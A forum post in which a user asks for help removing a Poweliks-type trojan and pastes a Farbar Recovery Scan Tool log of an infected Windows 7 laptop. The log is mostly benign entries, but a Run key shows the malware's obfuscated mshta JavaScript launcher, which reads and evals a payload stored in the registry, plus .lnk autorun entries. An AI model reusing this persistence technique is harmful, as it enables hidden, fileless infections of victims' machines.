
Help Removing Powelike!lnk Trojan



#1 pmate888


Posted 16 October 2016 - 05:54 PM

I fell victim to a fake Firefox update and infected my laptop with the Powelike!lnk trojan on Sat 10/5/16. McAfee on-access scanner detects the trojan and deletes it every few seconds but it keeps coming back.

I ran FRST (fix) and ESET Powelike Cleaner (nothing found) and Rkill (nothing found) but the Trojan keeps coming back.  Also ran McAfee scan (nothing found), Malwarebytes (free ver) and Microsoft Malicious Software Removal tool which found some items but the Powelike!lnk trojan keeps coming back.

Here is the result from FRST (scan) FRST.txt file:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 16-10-2016

Ran by Wayne (administrator) on WWX220 (16-10-2016 11:59:21)

Running from C:\Users\Wayne\Desktop

Loaded Profiles: Wayne (Available Profiles: Wayne)

Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)

Internet Explorer Version 11 (Default browser: FF)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(Lenovo.) C:\Windows\System32\ibmpmsvc.exe

(Microsoft Corporation) C:\Windows\System32\wlanext.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcPrfMgrSvc.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcSvc.exe

(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe

(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe

(Intel® Corporation) C:\Program Files\Intel\CAM\bin\CAMService.exe

(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe

(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\lvvsst.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\vstskmgr.exe

(McAfee, Inc.) C:\Windows\System32\mfevtps.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\mfeann.exe

(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe

(Conexant Systems, Inc.) C:\Windows\SysWOW64\SASrv.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlk.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcDeskBandHlpr.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\virtscrl.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE

(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\naPrdMgr.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\ZOOM\TpScrex.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPONSCR.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

(Lenovo.) C:\Windows\System32\TpShocks.exe

() C:\Program Files\CONEXANT\ForteConfig\fmapp.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe

(Intel Corporation) C:\Windows\System32\hkcmd.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe

(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe

(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\UdaterUI.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\SvcGuiHlpr.exe

(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE

(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\McTray.exe

(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SRORest.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\shstat.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe

(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe

(Lenovo) C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe

(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe

(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe

() C:\Program Files (x86)\Lenovo\System Update\SUService.exe

(Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe

(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe

(Symantec Corporation) C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe

(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_23_0_0_185.exe

(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_23_0_0_185.exe

(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe

 

 

==================== Registry (Whitelisted) ====================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [380776 2011-01-14] (Lenovo.)

HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] ()

HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [316032 2011-03-14] (Conexant systems, Inc.)

HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [60920 2013-05-29] (Lenovo Group Limited)

HKLM\...\Run: [AcWin7Hlpr] => C:\Program Files (x86)\Lenovo\Access Connections\AcTBenabler.exe [63656 2016-02-19] (Lenovo)

HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [113656 2013-07-02] (Intel Corporation)

HKLM-x32\...\Run: [PWMTRV] => C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.DLL [6422696 2016-04-14] (Lenovo Group Limited)

HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe /boot

HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1279120 2012-09-27] (CANON INC.)

HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [452272 2012-08-31] (CANON INC.)

HKLM-x32\...\Run: [McAfeeUpdaterUI] => C:\Program Files (x86)\McAfee\Common Framework\udaterui.exe [337440 2013-12-04] (McAfee, Inc.)

HKLM-x32\...\Run: [ShStatEXE] => C:\Program Files (x86)\McAfee\VirusScan Enterprise\SHSTAT.EXE [244080 2015-08-20] (McAfee, Inc.)

HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1156824 2016-09-16] (Adobe Systems Incorporated)

Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-10-23] (Google Inc.)

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**npfolr<*>] => "C:\Windows\system32\mshta.exe" javascript:kOer93kVe="gV8";YH7=new%20ActiveXObject("WScript.Shell");EQ6ORLQ="P";Y8Xx3V=YH7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");dS8UOEZo="JW2r1GN";eval(Y8Xx3V);s (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**ypqwknh<*>] => "C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk" <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\MountPoints2: {adad7ac6-fdcf-11e0-aba0-806e6f6e6963} - Q:\LenovoQDrive.exe

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\MountPoints2: {b16e947a-43af-11e5-863b-f0def19d1112} - D:\LaunchU3.exe

Startup: C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\472856.lnk [2016-10-16]

ShortcutTarget: 472856.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

Tcpip\..\Interfaces\{BBACEA73-8644-4A74-A026-251E28C5AC0C}: [DhcpNameServer] 192.168.1.1

Tcpip\..\Interfaces\{F3EAF862-B2B2-4EA5-8BBC-6869F9E0D984}: [DhcpNameServer] 24.25.227.55 209.18.47.61

 

Internet Explorer:

==================

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=LENP&bmod=LENP

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://www.lenovo.com/welcome/thinkpad

SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

SearchScopes: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7LENP_enUS458

SearchScopes: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7LENP_enUS458

BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)

BHO: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files\Common Files\McAfee\SystemCore\ScriptSn.20151229232150.dll [2015-12-29] (McAfee, Inc.)

BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)

BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-28] (Google Inc.)

BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-05-25] (Microsoft Corporation)

BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)

BHO: Symantec VIP Access Add-On -> {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} -> C:\Program Files (x86)\Symantec\VIP Access Client\64bit\VIPAddOnForIE64.dll [2011-04-13] (Symantec Corporation)

BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)

BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2015-02-06] (Oracle Corporation)

BHO-x32: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files (x86)\Common Files\McAfee\SystemCore\ScriptSn.20151229232150.dll [2015-12-29] (McAfee, Inc.)

BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)

BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-28] (Google Inc.)

BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)

BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)

BHO-x32: Symantec VIP Access Add-On -> {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} -> C:\Program Files (x86)\Symantec\VIP Access Client\VIPAddOnForIE.dll [2011-04-13] (Symantec Corporation)

BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2015-02-06] (Oracle Corporation)

Toolbar: HKLM - No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File

Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-28] (Google Inc.)

Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)

Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-28] (Google Inc.)

Toolbar: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-28] (Google Inc.)

Toolbar: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File

DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab

DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-05-25] (Microsoft Corporation)

Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)

 

FireFox:

========

FF ProfilePath: C:\Users\Wayne\AppData\Roaming\Mozilla\Firefox\Profiles\lh4xbcbb.default [2016-10-16]

FF DefaultSearchEngine: Mozilla\Firefox\Profiles\lh4xbcbb.default -> Google

FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\lh4xbcbb.default -> Google

FF SelectedSearchEngine: Mozilla\Firefox\Profiles\lh4xbcbb.default ->

FF Homepage: Mozilla\Firefox\Profiles\lh4xbcbb.default -> hxxps://www.google.com/

FF Extension: (Skype) - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-05-25]

FF HKLM-x32\...\Firefox\Extensions: [VIP@verisign.com] - C:\Program Files (x86)\Symantec\VIP Access Client

FF Extension: (Symantec VIP Access Add-On) - C:\Program Files (x86)\Symantec\VIP Access Client [2011-10-23] [not signed]

FF HKLM-x32\...\Firefox\Extensions: [{D19CA586-DD6C-4a0a-96F8-14644F340D60}] - C:\Program Files (x86)\Common Files\McAfee\SystemCore

FF Extension: (McAfee ScriptScan for Firefox) - C:\Program Files (x86)\Common Files\McAfee\SystemCore [2015-12-29] [not signed]

FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_185.dll [2016-10-15] ()

FF Plugin: @microsoft.com/GENUINE -> disabled [No File]

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)

FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)

FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_185.dll [2016-10-15] ()

FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2011-11-30] (CANON INC.)

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Services\IPT\npIntelWebAPIIPT.dll [2014-07-09] (Intel Corporation)

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Services\IPT\npIntelWebAPIUpdater.dll [2014-07-09] (Intel Corporation)

FF Plugin-x32: @java.com/DTPlugin,version=10.76.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2015-02-06] (Oracle Corporation)

FF Plugin-x32: @java.com/JavaPlugin,version=10.76.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2015-02-06] (Oracle Corporation)

FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]

FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)

FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-09] (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-09] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-30] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-30] (Google Inc.)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-10-01] (Adobe Systems Inc.)

 

Chrome:

=======

CHR DefaultProfile: Default

CHR Profile: C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default [2016-10-15]

CHR Extension: (Google Slides) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-03-29]

CHR Extension: (Google Docs) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-29]

CHR Extension: (Google Drive) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-28]

CHR Extension: (YouTube) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-18]

CHR Extension: (Google Search) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-20]

CHR Extension: (Google Sheets) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-03-29]

CHR Extension: (Google Docs Offline) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-28]

CHR Extension: (Skype) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-10-15]

CHR Extension: (Chrome Web Store Payments) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-28]

CHR Extension: (Gmail) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-20]

CHR Extension: (Chrome Media Router) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-15]

CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-05-25]

 

==================== Services (Whitelisted) ====================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1364096 2016-05-25] (Microsoft Corporation)

R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1687680 2016-05-25] (Microsoft Corporation)

R2 CAMService; C:\Program Files\Intel\CAM\bin\CAMService.exe [1243344 2014-09-03] (Intel® Corporation)

S3 DozeSvc; C:\Program Files (x86)\ThinkPad\Utilities\DZSVC64.EXE [326160 2016-04-14] (Lenovo.)

S3 Lenovo EasyPlus Hotspot; C:\Program Files (x86)\Common Files\LENOVO\easyplussdk\bin\EPHotspot64.exe [619776 2015-01-15] (Lenovo)

R2 Lenovo.VIRTSCRLSVC; C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe [93032 2010-04-06] (Lenovo Group Limited)

S2 LPlatSvc; C:\Windows\system32\LPlatSvc.exe [710144 2016-09-06] (Lenovo.)

S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-04-20] (Lenovo)

R2 McAfeeFramework; C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe [127520 2013-12-04] (McAfee, Inc.)

R2 McShield; C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe [262544 2015-12-29] (McAfee, Inc.)

R2 McTaskManager; C:\Program Files (x86)\McAfee\VirusScan Enterprise\vstskmgr.exe [208936 2015-08-20] (McAfee, Inc.)

R2 mfevtp; C:\Windows\system32\mfevtps.exe [254792 2015-12-29] (McAfee, Inc.)

S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268192 2014-12-04] ()

R2 SROSVC; C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe [446800 2012-03-05] (Lenovo Group Limited)

R3 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [28544 2016-09-10] ()

R2 VIPAppService; C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe [84088 2011-04-13] (Symantec Corporation)

R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)

R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3820960 2014-12-04] (Intel® Corporation)

 

===================== Drivers (Whitelisted) ======================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)

R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [412440 2015-12-29] (McAfee, Inc.)

R3 mfeaacsk; C:\Windows\System32\drivers\mfeaacsk.sys [64416 2015-12-29] (McAfee, Inc.)

R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [347800 2015-12-29] (McAfee, Inc.)

U3 mfeavfk01; no ImagePath

R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [496888 2015-12-29] (McAfee, Inc.)

R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [875928 2015-12-29] (McAfee, Inc.)

R3 mfeplk; C:\Windows\System32\drivers\mfeplk.sys [66080 2015-12-29] (McAfee, Inc.)

S3 mferkdet; C:\Windows\System32\drivers\mferkdet.sys [114880 2015-12-29] (McAfee, Inc.)

R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [344704 2015-12-29] (McAfee, Inc.)

S3 pmxdrv; C:\Windows\system32\drivers\pmxdrv.sys [31152 2011-10-23] ()

R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [45296 2014-07-28] (Synaptics Incorporated)

R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [206744 2013-06-20] (Windows ® Win 7 DDK provider)

 

==================== NetSvcs (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== One Month Created files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2016-10-16 11:59 - 2016-10-16 12:00 - 00024867 _____ C:\Users\Wayne\Desktop\FRST.txt

2016-10-16 11:59 - 2016-10-16 11:59 - 00000000 ____D C:\Users\Wayne\Desktop\FRST-OlderVersion

2016-10-16 09:37 - 2016-10-16 09:37 - 00000310 _____ C:\Users\Wayne\Desktop\Preparation Guide For Use Before Using Malware Removal Tools and Requesting Help - Virus, Trojan, Spyware, and Malware Remov.URL

2016-10-16 09:28 - 2016-10-16 09:28 - 00000022 _____ C:\Users\Wayne\Desktop\ESETPoweliksCleaner.exe_20161016.092841.6564.zip

2016-10-16 00:28 - 2016-10-16 00:28 - 00000022 _____ C:\Users\Wayne\Desktop\ESETPoweliksCleaner.exe_20161016.002825.7220.zip

2016-10-16 00:26 - 2016-10-16 09:26 - 00002050 _____ C:\Users\Wayne\Desktop\Rkill2.txt

